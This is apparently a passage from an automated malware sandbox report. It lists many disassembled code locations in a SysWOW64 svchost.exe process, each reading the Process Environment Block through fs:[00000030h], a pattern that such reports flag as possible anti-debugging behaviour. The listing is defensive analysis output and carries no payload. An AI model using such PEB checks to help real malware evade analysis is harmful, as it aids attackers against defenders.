                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov eax, dword ptr fs:[00000030h]2_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C6A6 mov eax, dword ptr fs:[00000030h]2_2_0366C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036666B0 mov eax, dword ptr fs:[00000030h]2_2_036666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6500 mov eax, dword ptr fs:[00000030h]2_2_036C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036325E0 mov eax, dword ptr fs:[00000030h]2_2_036325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036365D0 mov eax, dword ptr fs:[00000030h]2_2_036365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov eax, dword ptr fs:[00000030h]2_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov ecx, dword ptr fs:[00000030h]2_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664588 mov eax, dword ptr fs:[00000030h]2_2_03664588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E59C mov eax, dword ptr fs:[00000030h]2_2_0366E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC460 mov ecx, dword ptr fs:[00000030h]2_2_036BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA456 mov eax, dword ptr fs:[00000030h]2_2_036EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362645D mov eax, dword ptr fs:[00000030h]2_2_0362645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365245A mov eax, dword ptr fs:[00000030h]2_2_0365245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C427 mov eax, dword ptr fs:[00000030h]2_2_0362C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A430 mov eax, dword ptr fs:[00000030h]2_2_0366A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036304E5 mov ecx, dword ptr fs:[00000030h]2_2_036304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036364AB mov eax, dword ptr fs:[00000030h]2_2_036364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036644B0 mov ecx, dword ptr fs:[00000030h]2_2_036644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BA4B0 mov eax, dword ptr fs:[00000030h]2_2_036BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA49A mov eax, dword ptr fs:[00000030h]2_2_036EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362CB7E mov eax, dword ptr fs:[00000030h]2_2_0362CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB40 mov eax, dword ptr fs:[00000030h]2_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8B42 mov eax, dword ptr fs:[00000030h]2_2_036D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628B50 mov eax, dword ptr fs:[00000030h]2_2_03628B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEB50 mov eax, dword ptr fs:[00000030h]2_2_036DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704B00 mov eax, dword ptr fs:[00000030h]2_2_03704B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EBFC mov eax, dword ptr fs:[00000030h]2_2_0365EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCBF0 mov eax, dword ptr fs:[00000030h]2_2_036BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEBD0 mov eax, dword ptr fs:[00000030h]2_2_036DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]2_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]2_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]2_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]2_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEA60 mov eax, dword ptr fs:[00000030h]2_2_036DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]2_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]2_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]2_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]2_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA24 mov eax, dword ptr fs:[00000030h]2_2_0366CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EA2E mov eax, dword ptr fs:[00000030h]2_2_0365EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]2_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]2_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA38 mov eax, dword ptr fs:[00000030h]2_2_0366CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCA11 mov eax, dword ptr fs:[00000030h]2_2_036BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]2_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]2_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630AD0 mov eax, dword ptr fs:[00000030h]2_2_03630AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]2_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]2_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]2_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]2_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686AA4 mov eax, dword ptr fs:[00000030h]2_2_03686AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704A80 mov eax, dword ptr fs:[00000030h]2_2_03704A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668A90 mov edx, dword ptr fs:[00000030h]2_2_03668A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]2_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov edx, dword ptr fs:[00000030h]2_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]2_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]2_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]2_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC97C mov eax, dword ptr fs:[00000030h]2_2_036BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0946 mov eax, dword ptr fs:[00000030h]2_2_036B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704940 mov eax, dword ptr fs:[00000030h]2_2_03704940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B892A mov eax, dword ptr fs:[00000030h]2_2_036B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C892B mov eax, dword ptr fs:[00000030h]2_2_036C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]2_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]2_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC912 mov eax, dword ptr fs:[00000030h]2_2_036BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]2_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]2_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE9E0 mov eax, dword ptr fs:[00000030h]2_2_036BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]2_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]2_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C69C0 mov eax, dword ptr fs:[00000030h]2_2_036C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036649D0 mov eax, dword ptr fs:[00000030h]2_2_036649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA9D3 mov eax, dword ptr fs:[00000030h]2_2_036FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
